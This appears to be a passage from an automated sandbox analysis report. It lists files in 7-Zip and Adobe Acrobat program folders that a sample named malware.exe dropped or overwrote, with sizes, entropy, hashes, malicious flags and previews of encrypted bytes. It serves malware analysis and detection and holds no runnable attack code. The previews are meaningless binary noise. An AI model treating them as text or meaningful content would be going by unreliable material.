                        Preview:..i.F1.Dj.75Fn1IVK.M.Oh.s.....,...2..V.gn.w...I.....}...M...hk.0..t..].h...~y...3....W.^..V..2}Fs.c..v.y.z..{k.&m.....-...@JH.7.}T...I.~.vY..N-......&"...t\.h.4_......5...c.N.O.uv.....Y+-UV.S..6...Zn.k+.EVi..n.#..(?7..V.....NNgb...$.#.XP..i..?...VV..0*.L.W...+.p.O.$...M.o....[...<Wq..y..I.j.....0.....8.duH@f.mb}......A.!...?e ...4..\.......6...8..p.....F.I........m`2N.EgA2..M..$pB.8)..... ..m....C.X4....px..8")].......A4...x..*....A.t....B$....T.....3..U:EUI.'.A.n.d..Y.^.c!:!O.ue.&.ps:q...^`..j.(.?...&.p_...v.a..n..U...`B..%r.b...#....Au...$...F.w._!96..L<....#.cq..?.m32.$#...`[=.M....(.}.e.G...p.0.L6.r.d....u.T..~.$..SfM.?...w....zC...1.>O'..P....}......0 ..&{..O...NKW)..eT..1..:=J...N..s....3.H]...^...<..P.b.:..l.C9............aC...\.Z.....{0_v1..i.7z.e...X......_.v.h{..X..Ju.....XA....9..}k/.G.k.lP".;4).ec?.d.-..G ...P../j?...4NeK.(.j.'jT...IU3-wv..(G.G..Q@.8....z.J..~.........u..S..Y4.k_F..~.&.d.r....9C..-KX.5`J.....l...........`...

                        C:\Program Files\7-Zip\Lang\sr-spc.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12101
                        Entropy (8bit):7.98494434192338
                        Encrypted:false
                        SSDEEP:192:zy30w00lp6QnwvTO7Kvxj64U/tZmVy4kLZNWKkPrVrwtJmKD+O6Y6TdqqU/Tq1pn:z7wpD6QwvT4mZ64U/tYrmv1QrVVKD+OC
                        MD5:C1626ADBE5A6469326FA5D0F3B404730
                        SHA1:395D9E47DA2A4ECD40FACEB841A8B3D2664E1C53
                        SHA-256:8AC8DD0CEEC725AAE7CB74E305DD6F2ECF98FD8D0BD92DF6528B5B173F251B44
                        SHA-512:C529E23DB6FAE4E956E9765EF3F433B7AAD6ABA6D455D7B2A8DD30F0B5AEB52F2958A0A101284456521A1BC587BFA80CFC60EAB923CBF6BB6C1E1803917E5E21
                        Malicious:false
                        Preview:.6.... .b.u...(...+gX.Z...[........Q.w6.2...ox..T.f...dc....F?j..`....-&\c...#....q`..-...x...X!_...K.......,Q=.N..1....lEM.E...../.$..W.Y..=.Y..%..c\..d.....c.po...-...*.........%.L...c7...B........u......^c...n...y~...K.....?..'\.E=ku....>_...x.......0L.8..#...B.f..Q2b.2.q..J.q>.v.gG. ..%xj.........u.7..>..End....5N7.GoX.....e..%/.,$. ..8.o....G......p.$w;...yW.....(7G..~..$.I.*.."..u.Y...~....1.....P.z4>.1.....*..]..[xt.d\.(Vn.. ..Bk.e.c.c......hl...R...[.=..+.D...}.R..W..I>..'...&=.~...YY...#!..wUc......?y'.a...{.&...<w..0...4...ePy9._.c._>..I'...f.B......ZVN.W.D7..m@P5...^..;..b..+..^*)..b......E.[......P7PDal..7...".]&.V.M..W<.Vh..aO...I.L.EqC.A..P,M..Za..\...3....k..X..n.... `..S..KR...".....d.xI.A..VrkS..85....mc.a6.7.KC..C......9...G.I.c..Cb..>..Hc...........%X....zv...}gS.....1$.0X...8......Q+..3...=........qgb.1.}s.AY.......a.A.'.!.v..(&.Pn............u.z.{....g....`.%.9.x}.;'.....$.....G...t.b.:.$......i2._..FeOt........ef.M.~.I...A.v..+5..

                        C:\Program Files\7-Zip\Lang\ta.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12569
                        Entropy (8bit):7.985720164197797
                        Encrypted:false
                        SSDEEP:384:aqM+QfUucXtTM41tclpgoYe5I3Y8hH+YL:bMdQ1/CWe5IIG
                        MD5:5BEA343FF2B481F8111EC3CFFF90E470
                        SHA1:F5C7B4F1A09315C9D0E52A505FE8708C89CF13F9
                        SHA-256:586577AF33D286F2350DE086F56611020B1C98EE1F4A8E24B5994AB5879DD252
                        SHA-512:BDDB7AB292519DC540E6650D3C593ECF8E56D601DBD949BB7EEBBB25DAE70A8BE311C053FDA0535FD10CCA5AFAA369A6A76D50BB938E39EF6E014BB1FBC6BACB
                        Malicious:false
                        Preview:N.....S.....W.P........l......{.a<cs....)....?.K...s...I.Z......1|..ZZ.[....v....:..8.:.n.\).......IE....]5......5...\.4.j.b.vU.o..^......P.|.e....&M..l.fF."F.K^h..'d...Uy|..,67.L...d{..5Z.....{G.v....G.R....C.bT...v9..Z.G.B...pk($...D....26d$..=q..>n=..nT.........D..k...R_!.cI..ON7.%@.Y.^...T+...\<.e.I>..s...a..%.fN........0..'r.g,....;j_..d`...]....N.......]o.h,..h......'.._.......Uu......S..,...H..Q.....~.....+w..aI..1Pn....A.r%.S...ZX.....e|^..2.<...{eD.JZ.a..F%c.@.gCs.....=.{RI.n.u..u.....'.(.L..b..!TP.n.`U..e.....,......t..4.yM4A.....ok......f..............(...........c.LB\..ZQJ.~..}...z.OB..@......MA...BA.X.V..t.y......H....x...%~Ys.f.f.A..o@.a.M.1o.BH.J....E_....q'.Q...t;Sr.A."...r.y..[ub...#......*j...{c..y..........o..Cs]n...|{.xg..:q...I.. .u.nu%+..Y.... .7.m......y....V.Y].5H..._$0.p.G%.4r9.....z.......i)|...J..a..D.8......."...|....Ne".....U....=..>.S..o..V.Tq...jp.Mv.8hZ..HM....V1Q.d...."..U.NLI?.D..|W.....v../.M.B..k.'

                        C:\Program Files\7-Zip\Lang\tg.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15235
                        Entropy (8bit):7.9862283134036245
                        Encrypted:false
                        SSDEEP:384:UafvS6cRZ7unXPLbdbLq+hGBujMPYfDNHCjrXr:hvSBZ7unXT5jtQAf16r
                        MD5:7182A543457E7F1B7C1427560D600BBD
                        SHA1:B0FD4FEE7559921C06762E663472C2D21A5ABA06
                        SHA-256:C83076AB6B87227FCBFBE8ECA04BFE631F7CA1E6F92F321861FBBABF4E01277A
                        SHA-512:62A3BEE68517610294B274C59EB7DD14E9977557FB13B75D3408CC581B59653CC6C638ED720186B9B6A158A931F8B58287EBF3BB24D82288234DD68298B50512
                        Malicious:false
                        Preview:.Q....v...DB..#b....v!=..S.g5./.w....T.r;..hO.RH]u4JG....MQj]+..M..E...d'.u.....IT...<...i=.QnrX.".o.BHK...!?...Cu.o..0!.BR...\.....%.$.r.?3.%.Jg..c_....$.T..n9.5..cI..j.I..-gh.b...9;..~..)...(..fW0.F.%.U..s.w.,.u......M...H.1D$&...o...y.:%*....\."......&tl_X...0.v.Yn.<.C.<<.t.5.p..E.\.*.."3.t..yz..I.M..Q.?..i.S .L.u._.W......^$p..<....h,.]5.2...H.wl.,......W...[..$'.........=....O|f.....k..B......_......:H^<O.n6...j}G..UTV....[..j..?........7#{..@..h..z.Oz.,..Y.D4..G.,..(N7...)..\(/oR'0...C......I..8....u)hO.ubH^..z.4.M......C..K.d.g.^..T.!..Cp=....R.o..Ef......*..k...n.....B'...K.Z....J...."O,..../.F.7B.W..!.GF....._.2v.\...t).f.$uy..H@..K............C.."..id.'.#. K/P...........&...4y...\A....f&.....[.ti....c...Q..X.S...r5..%d&e./......Z........e.R..H$I.:]XS..>...=..!$.<.iY..V.5..?0..2'./....j.d....>....<P..s...5...4h.#{.i.t-i....e$a..!o.CQ.o...:..)C....^X$.o.Q.9..9.j......N....d...c...?..?..Fx....`......'.4.Z9...{E.'.-...

                        C:\Program Files\7-Zip\Lang\th.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15962
                        Entropy (8bit):7.988166570743712
                        Encrypted:false
                        SSDEEP:384:nLlyVvxxWeIAG+hY0XA/Ooq4VrGY6vEiFB/LZ6e2L4u8Bp10d4Mh7g:LlyJhOcXf4sAcxLZ6es4uEpc6
                        MD5:4A1BF470D4A14A7BFAF06E84981DDAE3
                        SHA1:F2B7F3C1BFAA4A38CF50DC24F2FB1F89AA608B32
                        SHA-256:62F9D88A78070C8A0328EA1B771053E9F735DAB08DD8D632EABFA7240891119F
                        SHA-512:EA8719771700FBAE77FC0A4C12C48D25937D45B8537AAF3E6D3F2E1961C4B40A5CCE1DB89E89BB40A621AF59CBEC1311E28B647A77F92EFE3A5EE76CCEC008F8
                        Malicious:false
                        Preview:...)..\:n.e.T.G......9.V.N.wc.E.8..u..._....j.0...0.Q.AEG.....1A.w........r7.3......A.....+...../.GX..d.f(P......W.+.H.e..M)/3..Qa..[O.$.....$+.....A[.!.|.>N......pt....q2.:j...1...z...l..._y.1$...Xg(...g.>..o......6.KJ4.le6LC.W......t.c....n'.j}.t}_A.%.x..fpr.7I..^...w3.(F&.=U..>.%..U.P_n..Vw.../-......A..M.Q...h......j*|.._..Y...H.K..+j..N..$..A..F.......W*.P...2...)W_.......p<.[@(JN`...$..O.)..5.....x3rN.$......5.[.}.E.........}...^.q.60...PZZD.;z..C.&.A.t. G....d....e:g..&.../b. }.B..~...x.a9a./6...qx..5K.<.`..1......s:.K<.'.`s.r.@I..7#^........^/.c:.._4B|.X.....b.|}..:..q./6i.]..f......\.x.H.o.e.9...A.d.._&.4._.)...2.2....KC.0...................k.|f.{y./....y .i9...o.s..7.4L..JA...i..E.2......S{.z...Cxg..9g.>...d......qN.C.V.wC.f....].$}.M6&.)....?...Ct..(v.....E.....`_..5.E.jQj...}Y...f..b.....4.....6......U.Q[Fg/G.d.Y.&.........M........XO^p.VcUN....C.M...../....... e.S.J..{..~..-.'x~....8..&...M._p..Ib...@L..c..Y>E.Z

                        C:\Program Files\7-Zip\Lang\tt.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14309
                        Entropy (8bit):7.986581169762799
                        Encrypted:false
                        SSDEEP:384:fWl2Vo7gwAx2d6Y9SS63wyjxav+/sRQa0YWv:fv68YUSef9B/sBE
                        MD5:A28716C4991B5CE7F71CBF69D5CA0D08
                        SHA1:0206C1981133597BA49746192585917215D7EEA5
                        SHA-256:73FFCC1569B5FFAD01A37690BAF10CC1862E1CEFE60D3391AD8BAC899589A758
                        SHA-512:DF0B0D80F9D42A563C2D19A6CD6133E6C20E91C479E474CD6036F5AE84E7BD3BD5A0D6060AD3CB7E75EDC1C6A238A5B8CB7E2DEC0924B6137312889F15AAFBC4
                        Malicious:false
                        Preview:.g....G0D.J..].=d...|[].:R....g.....A.....a.....5.m...-|HD.s.E...F..[.|..,.+....=C...ya"C.....=.........6...b./...C5....m...._....t`.o*.r.w.VV.......H.........q.p.*..i.8..'FLN..*..T.i.5N....eb.<...r.T..f...P...>.4(Cz........&.... .?2.$.p.k......#.'.`.Ri... .7x.;.S....e..Z.. J..>.IE...Q..c..a...sB|H|.t..".!.....q..VQQ..N%...ck.^i..!...."...1\.uB.......(r.,....<..7.&^......1..M..RR..v.....j..G..SN$.....n..{FU.i<..9..0......c..P'<..............mAc'.*.<..u...ga._<......*..Z..}3..V).}[:....3?.......r0..z..Yq.....cf.Q.&...J>.$.....+5..b.3..m#....Z?....j.....ut..M..5.gc..c.....p..4J..-9w.2]Em.D..d..65..#..B......".4\..I..eTz..]<5Q =..............g)F&.r.)....o..,.._.}QA.7..5p.Vl.9k.o."D..H`U...(.h.P|.Ls..W...K..n|.........SY.A....-B....w......_..LR@x......^.8..B..c.).....).......G.|....G......b.9.{.!V.....5d..o3z.'3.&.h|[Z.:.>...CGf..hL...wLx.2;>1?....w..R.~v...*E....8.a..$<.....r..u.l..>:M...BF.:...A?.X0..R.e.U...kK..` o......{.CH..

                        C:\Program Files\7-Zip\Lang\ug.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11494
                        Entropy (8bit):7.981740354993292
                        Encrypted:false
                        SSDEEP:192:sGbwShKV+s6Z0KANvPsmGD74gDqWM/7+wO1t4XNFtlXHMkfEsVsIj:FHhKVqtAhGDcgDZM/7kGXjtpFEsVP
                        MD5:23110D264A7AFA8E159F331196A43CAA
                        SHA1:23919DA9A5DEB0C5261ACC1787BCD9DA84ED4650
                        SHA-256:2B2739F901B73208DE8D475216DA66C9EED0ABA5A5BB2661B78F1AFB597D07C7
                        SHA-512:FACE3D32917D98A021CBB08CE79E029925D5D7B5B0BFCA09EF327CD6B5D0B49837C1517835BE8660E099E96D8C1EE2CB48D28BC98AE7E9F9473680D3089AF36A
                        Malicious:false
                        Preview:..`...q...Kk.KA.U...^.&1..J..l.l..i......^.(.Q.D..........h..E.....a=.9eI.y...NBD.}..N.....P:...A....x.."/......:f.~4.`/[Z.......!..,....d\..b[".Z.=B..zP.....o.......C..t/ xk..8....v.....\...~.]...v.N...~..XX........k.T...c.v../..<.e:#.6z.{.....c.]O.0._I..2.^2..T....cD...|..t..........N.myjg.:..\...&.v3\..~z:E.......o.>I..j.S.h...R+#.`.....e7..9.......o....A..\._._.r......G1D.x...x.nF.o....3'.+IF......R..7...5x2..q..... 7;{....q.0......IVI."!......1q.._N@Dq.+.......&d.T..47A*...I..RqM...f..R8..i........'.....Lv.L..~wB.4..!..U.hT...R...h.S.....&?.q......A:2#.......^S{jI..<...`.qN86..;.D]....c..^..%.......Om..%w..}$Y....>...j..S..K..f.....Y;....S...x......a+..m...'.Qf.I....(mh.q1p.1r..k...H/ .X&$.M..'W...@...I#./t3.ga"-B. B...I/....:...U...t..1......-2%_Q.~.QB...3 j.DQ^=.1.#...b..c..nD..y..J[l...]...........u..M.)t..P.....3\..1W.*.Sj.|]...e.T..j...e@...urO<..+W....3-.\.0..CO..7..M.[.iw~..Y.L.6c.~..q..R.q...:H.p......s..<....C...

                        C:\Program Files\7-Zip\Lang\uk.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15870
                        Entropy (8bit):7.988060132624251
                        Encrypted:false
                        SSDEEP:384:Cz4zHAH3H2Wt5zIIbdHg9Q6biYrwS55GhSf:Cz4zHAHmWjIIbp6Gu55+o
                        MD5:49E32020AA1E4F88BBF67158B502F67D
                        SHA1:2D20855828EBF5142B40566C31CE216E2C95BF3C
                        SHA-256:0C55E2475302889F8B057738B660ECBF9ECD7F81255C31243BB53355968F01F8
                        SHA-512:4F603467183A096F90AFBBFFA7C32DEDF21E97524DD480778991E7EBD9BFA9E19AE113234CB1D43010902DAE552EE51D53B1BF123D8099443718A4475A8F2771
                        Malicious:false
                        Preview:&..~p..|.<I1..wi....m.@..].y.....W5....N.0..t?4p..[...E.."sWI4CQ^2.....]..[K.t..t~.I0o;.R.K....o. ..O.c.V..R.%Q(Z..B...O7._...3..`.l..q.f.h........".l.......\..,F.Wp...H.vX.0#p.!.M...V....<.{g..;K.(.+/I... T.(.{.U$K.....S....<lQm...'.E#8.j..!....[{..Y.-.t......?.Df8!Q`T.-....d.{.....4.....+.+f.w ....uvWs.:...R.....zx..A.m....>3.<...Z>!ON4..~m..}.j4M..7..6...} ...=.l..!q.XD..UB.....h}...:9..c..cU.>4...*..........HY..".......*...Pz..g*.7U....E.....ofh?j...48@)dn\.B...U.y.......6.T..... .V.......l.w....q..:.L.SM...C...^..,...A.{./.-r.o...Z"..t.0...~tx..]4.Q....SS..+l.J.Y...T...t-Ry.s....Gh.@.TP..(..Z)Z5....C..'...h..U..\.s........4z..5.:..n..\o.-...I..)c+i}........$....z..2..mKv...p...J...i.#.3#d+..PaH.H..;..J.&.H.d.mU.....gh...#.m..8.!l.RE.SP..........A...<E.m.8.O....t.#e.KR;9.......4.Y.o..C..~.jx..gBn'.Bn\..YN...s...d..+.9...i......=. ...nS...P..4...(...................sC.......KAy=2d.W!...o.<.R...3.<...E.W' .U.xPtt`$....rq`V.....

                        C:\Program Files\7-Zip\Lang\uz-cyrl.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15275
                        Entropy (8bit):7.987528489546148
                        Encrypted:false
                        SSDEEP:384:AwpH/9pAavedm5k5mtir5CVt0SPpVqW1quB63d5O:Aa9pAaveHIigYivqo6A
                        MD5:8C4D569C83CD4FC32A98E28E355177F0
                        SHA1:52CB12943A035A76C27FBE16381FAE529FD8AD5E
                        SHA-256:D9BFA862936822001EE1C506B711415CC7C60B6992F659404A86E882369D407F
                        SHA-512:3F7E0C397EC2FCA642C524F964035EF4E107C1EFC273D53BD241469B9011D8816C5ADFA649F06933D1122CCD9226323922AF21CB9CCE79BDB14963E771F263CE
                        Malicious:false
                        Preview:......j.$y.m....U6.1.fpb.\e.. $m.....xC.....U.......>.....M..8.................m.TU8....7."qd...[...d=&...6...k..lE^....d...}....'.H]2W...;.2.'.."..C.....K......p..;.n].tTs8G.#b2...:. .k..'=......}StvG.Z1 ..S..uFH+..o.8......L.t..GAI..s;j.d#."P..z....>VqQY ...o..).@.Y....N1.C...3...R.Q.............B.aM.....)...?.;..{...9.F(rJ..J...+..RX7..._Y...`.y0..o..^..u.....q.F.k..m...Vn.`x.<98.W.......Y.>.V....jrZ.RS...u'.../:.`4.a.!...w.X..cQM.hS.....`.....\}......1.X...^]..~...(jI.c...P.........g.....m..e.].J..}...^k.!.<..f...t.NpVk[r........<.._<4@.c.j..YGv.1..UQ9...+...>.s..gc..f...._.I.^.!...b<...2."3.b=......x..k[....A.i.!...J.~.X.o...:.._~.P.h...o...]`I?+.p.p.C...cl....X..<q....V)Me{....#...]T..I..0...w|....i..i7..JW(Rv..._X..&.....Tk=n.g..S...C..V...o.Y.J.Fd*.....K....?.....*"..&..SW7..W.}...4..."..<..-.v.......|a(.....o....*;...81v.`.T.[..HW.#..R.'.r.}?&....v$..-YIv..N!..C...`.F!...O(.5..[I..rzd...M.O>....V.$ E..<x...._...c.i.u........u.

                        C:\Program Files\7-Zip\Lang\yo.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11072
                        Entropy (8bit):7.980835207106132
                        Encrypted:false
                        SSDEEP:192:KDdYqSMDESQ7vWs08kSQ7a7jNg/cEvssF1bf1pXlET226IK433/4B5q7Ydf:KBKMgSQ7esSSQQNg/JT5dtlZ26IKh2Yd
                        MD5:73CC571675B98914C3E9C297FACFF1A4
                        SHA1:ADB4A93554C83E8C6C78C956A85001C478B30572
                        SHA-256:01996E05319B5856ACDA69755474CA94F502279E0936AE622678840A5AE9124A
                        SHA-512:C6C76B21A81F3EFAA7ABBC8CE4DF4150BFD39A39DE6413F9000C451424DF2B110C26AA91CEEBDFC993F3B46CFA2ED33A91A54036318FE1C43EABDECEBF92EC2B
                        Malicious:false
                        Preview:...v...I-_.zyF..........Fj........9 .)>...l.;0.@....8.MY....MO.w...k...?...w.w.....k..s;..,..6...|..)R..m.v~WX^.@Y..J0t8.R.~.S...u...?!..l&I..C...:.z.....0C.Z..T.V]{..4L...b.'.Yc..u2..W..a.en.o.H...Ze../.[.*.!..-.]....|6S/.x.....#...\e.3g.......%........cpR.h_..r.R;f6.J._o(b#.gcx.(.04....c.G.X...g..|...........T^^.?..lgR...Mo.y.....Ms7...qLK.&U.K.../D.B.G..X......>......|0.;..%..#.9..........em...NE. %..+V.....x...\...]]...OA..?.).H...I...c?S....!..m.G.J.|..I..e...@J)..`,..Yg1...2|...<T.1@'..:n.:.3V.....[...A....|.Ph...1....n..rU?{'N.p@.E8.y..m.o.ER..........(.u.;...h5)..R...M.....=U..R.......\F...9.Q.....S.=1..xaF.@x.}.G...M...KdP9.7.0...7a.<..`...g.f.t..e*.R.U.J...............}t.;,......V.xE...?O.x..;.J...A.u.K .._`Vw.|n......T.S....-....N....h...<..=a............C...S..3........<`D.#.Sx{.L.@..,B.#..&....S0I..l..b.=A._.....x.Y>R`.....VQ'..e.....P."l.2.U3O.Y.s.q..#%..X...:...*......HS.mC.G...u.>M..==.w...6....0>..A...,@Q....z....`.."b6

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):186945
                        Entropy (8bit):7.999079100703546
                        Encrypted:true
                        SSDEEP:3072:14hEfsZzjSoloy5duLDiw5cCw3wp+RDOxibF/XT2uhbmKRAo7vLniV5gVbeHe6st:18EVoloy50nWCw3wpsDJbFAKhLLy5gr7
                        MD5:412857867886A77891436F3F46D0B237
                        SHA1:123FC64F0A036BC5FAF9D4A62EBFE1B5A03D86BF
                        SHA-256:DAA935CAB2487BAB585B1FDB79971F924352098F9F1675F379EBA60DFDE0FABA
                        SHA-512:1D6475497FA2D3103D43F5660D5DCA499E4A1BF0B34FD2355CE13EB3DF98008C91D21D237BF2B2DC5660EE5DEB231B2C9BD0D12188DF320F1E3424C687005218
                        Malicious:true
                        Preview:.4."..y.....@..e.E/.RkwO*....|...2..42;.Vd....v.......`?T....&y....wvxT..@..X..D;}......E.6...Zi.gL..W..^.v...]u..Z.p`]D8y.0...[]..+i.Q.....m>.q...n.....nF......Q.c...9..!B....:.......xp.i.....-+..^\.u.X....EG..A.u4.=E.`Q..........["..N....X.Z.Z..Lv.......Y.tR..t...f.Wj.......?(.U7>z.<...c.CUP.r.#..B.").w.$^4...1G.j..z.........m......`..Z.... ....M!\...K.....jG:E!..@YV.c.U.h#^.,...!^.T...........FT........U..3D.y.ZV.#f....nW....H9A...&.V..P.-...po..Y..F..2.>3.2.0L.. ..T..n| .f9....L-.....GLx..V.=d...2.B.....QM...-..........I.$v6....%N...bB.,.XO....j..|...Y4.....?.....L.........(../.......`..........Z........}..c-.M+.a.gj..#NQZuA.......g-.>......Y....b....m....,.....o(..i........X..+...I..v.w*....q .T=|..2b...G.:.Ba.4b&(........+..H..!.../.....44z..I.'..9d.k.J.....g.+..k,t.C{.&3...z..k}..q.Y8,u..5.?0..A....M.D..,.F...iw.Q...)'S&.....ODK...F.Vb.SR. \....rZ......}..Vg.."IL'v_.vn..9......3DO..j.[f5n.....w.).^...N..v.m....x.gU.?.......<....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):27136
                        Entropy (8bit):7.992908844900935
                        Encrypted:true
                        SSDEEP:768:XvaCBn1gSY9jSFenUOBpWroHttkDcZfGhCQaHl:faCBnuqFRapWrozkAZfECQ6l
                        MD5:1D10B68C3C974C858B097A1C6579799E
                        SHA1:E6469564B8D1A29BA0CF945D398EBA3BA9AB06D3
                        SHA-256:549EE502D6CA621BC1531FFCA57D940516BC92E8AF8BC7A4AAD7BB46EBE3E3ED
                        SHA-512:319221EC44BBEA19C1CA6E1D10BB48DF540C305C455FDE6A3AE0095F1F8998EDFD00CB3D32B1604F2713B6309500259E147DF0EAD1C010AB7CB799B1772A44DA
                        Malicious:true
                        Preview:'.n.......PR...!.... R0!.G.X...p2.&.....e....P.._.b./..F..f..N..~..{.".."B....KKAy.%.W..|..+.......Qw..q...Z;[%.L.....E;...5..vkZ...=..3H$3.\c..u..3..X..C.'_..^....m.Z..J..........l...:#..l ./..5"..n#.:...,_n.1K.C\.Q....P..~...J....{I.t.JT4.e.....p#....7.u[...U..iEPp,.W..f?.AN.j..,..:.f......w{.o.\..a...l.."C.Zws..J...*.&z|L..$-b.......0/..z.._TK.....^{.r)6.88.6j....p..B\\..J`E6P..1#...n.N.z...v^.w.7...p3.2...].....5j.2\..4..]3.h[?XbIbsM".41.>.|...\q6........8[;.\..z...".*.*.Np{|.G....r.c.....$N...(.....C..v...^...P.[..8u....mt..n.......JUQ.z-$.+........@.....bC..a.......{.}W......Uo...;C....a...p........w8]I.....A.*8lG...y..x.<.>)...\].{Y...o%K.p.N...I.M.3..SUn......1.e.........x..uJ~;..3..Z$.(./8\u)<..R..GA.[...r...._q....:.>.w....*...:.......Bw....`$.d..7..b)......}2M!.."(!@..~...[..Kif..-..]...F.c')qU...X?.........s../..c..F%...B\. .+h.=D`..6-.a.&....g*7}.@.}. ..$.'.M.G..z2/...?..&.cw.z$.....:..K....W...eo.k.~...c#}R.....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_100_percent.pak

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):614706
                        Entropy (8bit):7.999645916960175
                        Encrypted:true
                        SSDEEP:12288:LJxNQ00BzpsanocWFZkc4itaoU/b13WuIaxBm9cESF5p:F2B1w6c9pU/b13bIRcbF5p
                        MD5:15E1453C84D69424F874B0E65A5F374D
                        SHA1:D7655DB36365D6129AF03E68ABA73A30D7FB421C
                        SHA-256:095948D3917183FC75B33C60828A191062D9E16911F8F9442C27D26F8CC0FFB7
                        SHA-512:F2AE924709A2BC7E6CA07636DD4ACA9713D2E0BED398E233A70EFCE5137D2EB44E224E2259811469D0B6EDF36F80307AA332EFC9F6DCFA5BFE153EF6E9B5B75C
                        Malicious:true
                        Preview:...YU...v]R..N&vo.;9......@.6..o.#M..c..F.,...........p.%...l.<b..~...g......+....W...m^..8B..a.B..M.....?..Z..M..B..6.KK..e.y.!D.0..-...p[..........2..b...]a].K....f..^oj.7rgt........%.....c.bI,.....88.uJ...H....0b..Q....DlxW.o9vG>..4L.6C..x>..k...)......s.jZn....P.&.....o..4....+..\.u.>...2W...B./..[.... ....<...5]..g.T../..z.72.!.....G....N..~..s......h ./x.}+.@Le.)|]y_uX.+S...........=-..&...SSF..U...e.!.z.<..L..((..b..I._.,J.....b..q.e.8.c}hR..k.a...+u[U*.}Y....9..8.J...m..6.u..)...)..v.6...m.7N.$E.(.....N..S'.<.].F..|..I.....|..X.*U../j*s.....6...o...m....9./. 5#...wTJ5z......m....f..w..i_.....c).........mPw..`..I...k.w...|..Z#".O..J...w.ut..O._.Z.....;s.(...........AM%...E_.....K.L.+rq.L....].j.^..n......a).-.A......._.x.wg=;..]....*....o..H....}.zE....:..{P...uC1.-..u....We.U&..t..;..i..prT......R>.......P .W......F.v.3.....S.fr..c...*..).7~..M.....P.N.f.|?.2..F(h....N&6.R.}RqrN.4...]}z......n..!R..N.C.......z..u....`B..T..r=.A.......\

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_200_percent.pak

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):918617
                        Entropy (8bit):7.999771679322666
                        Encrypted:true
                        SSDEEP:24576:lJQrE+4w3YVUnezmraUjTC0nXVToMfe/c/5bCh7f:lJQQ1d1maUn5kcm7f
                        MD5:52210050A08F20512DB1AFF3BC37F94A
                        SHA1:A513CC4A7883B8AEF326BDA7D615F79638196FFE
                        SHA-256:B17D75CAF09FB3CA7EA21E5AF126350F6652FC5B74F78F1B62FBBF13F3BCE8E0
                        SHA-512:04F93292CAC62A1EE7023D7166E4A3E92DE91DCB1B1FD3FD5D1C0952DD38260A10B529345256BBDA31EEB7BB6BEA82943F47B702A8111B4BC230E5912A533CEE
                        Malicious:true
                        Preview:2R..(....Jr.<.~h.......s>.p%E..@&Rv.s:LtR[1...E....4..u....6....,V.....F.....Ymu....+....Zw...{H._B.t.....s.......H....r%.0jEJ.+.....w..X8.T....)..s...;.^....2.h;....w......h.....nkS..W.....X......`P..-...-#.7..G....\.....h...p..q....n.6.y.'p..8..j. uo.)#.wqVz.....:\\.]|O.2..P.H.~.%I....gC..v....*a..2..Ki...D.);S.......eg;.}.f....!.?9.....i....b6k....b.9.N...D.Z.;.r.RQ...Z..P...F.G|b0K.VN........2...b.........C6.c.d... ......."J{.._.....v.......9hG...E...!V.h.../.8gL?.L$...F.e...5].&..D'..F,....nK<.US..?.<&... .D..M......i.N.~...#.V..?b..Y..r.d.@......H....8...E..%...w...8..|.".`x.?E.Zi.bN........x.q.....C.pRb.o.2G.Y..=Yw.e.........K.[...y..........xD.*x.1.Ky.6....S;.t.t.K...&.....v.t.32...m6.OD..rH..bt.>..0.|......[..5|.DK...Z[-g..A.87>.w4k...P..|H.....gk..NZ.._z.s..yH[.5.B....X.]` k....<d...@......[,.w.r....D8.Gs........L..:.*.!.....Z&..#nN.l..EZK..4..o........-..t..;.`9H..B.....{p@..J..}.DS.#..S.2-v.V3..h$ao..ir.:..[..X/.#

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\icudtl.dat

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10451148
                        Entropy (8bit):7.189992122418656
                        Encrypted:false
                        SSDEEP:196608:M6D2zHhDQlBrXBVPkvliXUxCGZHa93Whlw6ZpYvkJBRWE:bDTlBXBmvliXUxCGZHa93Whlw6ZWMJGE
                        MD5:C0A3D77824C500BBA4F4DD7E2CF32573
                        SHA1:BAC0BAC6593B379276DA897F253728747E60D064
                        SHA-256:3E7F58DB0543242F65E9EC27D169819CEC0DFEA73AC1CBDD40166DD1E1646D83
                        SHA-512:85E59DCC9CE9BEAEDFB7F63AD3DC588D3C197D4C2FEA4B9EC24AB02739EC9893F987767E509B7DF4D12AF202D4521F8707A46BB7BE67FB7E206463057C279C51
                        Malicious:false
